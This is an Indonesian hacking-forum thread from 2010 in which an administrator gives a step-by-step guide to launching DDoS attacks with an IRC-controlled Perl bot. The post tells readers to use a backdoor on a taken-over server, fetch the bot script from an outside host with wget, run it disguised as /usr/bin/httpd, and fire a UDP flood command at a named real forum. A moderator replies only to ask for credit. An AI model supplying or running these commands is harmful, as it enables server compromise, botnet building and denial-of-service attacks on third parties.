IndeksSelamat DatangPendaftaranLogin
Forum
December 2018
MonTueWedThuFriSatSun
     12
3456789
10111213141516
17181920212223
24252627282930
31      
CalendarCalendar
Clock

Share | 
 

 DDoS With Bot Irc [zombie](Uncensored!)

Go down 
PengirimMessage
Admin [B0C4H]
Administrator
Administrator
avatar

Jumlah posting : 201
Join date : 19.10.10
Age : 28
Lokasi : Padang

PostSubyek: DDoS With Bot Irc [zombie](Uncensored!)   Mon Oct 25, 2010 4:28 am

oke langsung aja
--------------------------------
Tools.
#.Backdor <--- bisa kalian dapatkan pada saat take over server, atau kalian bisa pasang di hosting +sendiri(yg ga gratis), atau kalian bisa beli, kalu bapak kalian pejabat #.MIRC , login ke mana aja, misal /s irc.plasa.com trus ke room PHL
#.yg jelas script bot perl, anda bisa dapatkan di : http://phl.web.id/split/bot-phl.txt
----------------------------------

instal Zombie
#.buka backdor
#.ketikan perintah : wget http://phl.web.id/split/bot-phl.txt <--- ini adalah perintah linux untuk mendownload script tersebut (zombie) #.jalankan dengan perintah perl exploitnya
+.contoh erl bot-phl.txt irc.plasa.com 6667 bandit bandit PHL Ichito-Bandito /usr/bin/httpd
yg dimana perl(script) bot-phl.txt(script zombie) irc.plasa.com(irc host) 6667(port server) bandit(nick bot) bandit(nick bot) PHL(nama room) Ichito-Bandito(nama pengguna bot) /usr/bin/httpd(pokok nya harus pake ini !)

kalau sudah berhasil makan sang zombie akan memberi salam di irc dengan kaya : YOU ARE MY MASTER
contoh :

oke zombie sudah terpasang
saat nya kita tembak aja

ketikan perintah :
!bht @helpsebagai perintah apa saja yg dilakukan bot, tapi disini saya tutupi perintah yg agak ke dunia hitam, tapi tenang aku kasih kok perintah DDOS nya, kan topik nya DDOS bukan yg laen

untung DDOS ketikan perintah :
!bht @udpflood http://forums.hacking.org.il/ 9999999 99999999
maka hasil nya akan seperti dibawah ini :

okeh sudah kan

_____________________________________________________________________________
About me klik:
 


KALO BERGUNA TOLONG DI

sundul sundul sundul

ga nolak juga loh di kasih ++

cendol cendol cendol






†F.K.B† TEAM

Kembali Ke Atas Go down
http://padangonly.n-stars.org
subma
Moderator
Moderator
avatar

Jumlah posting : 141
Join date : 01.11.10
Age : 28
Lokasi : medan

PostSubyek: Re: DDoS With Bot Irc [zombie](Uncensored!)   Mon Nov 01, 2010 12:57 am

tolong sertakan credit atau bypass agar tidak terjadi konflik terhadap forum lain maaf bukan sok ngatur
Kembali Ke Atas Go down
http://juliyantie.blogspot.com
 
DDoS With Bot Irc [zombie](Uncensored!)
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
 :: F.K.B | Tips,Trick :: Tips merusak warnet-
Navigasi: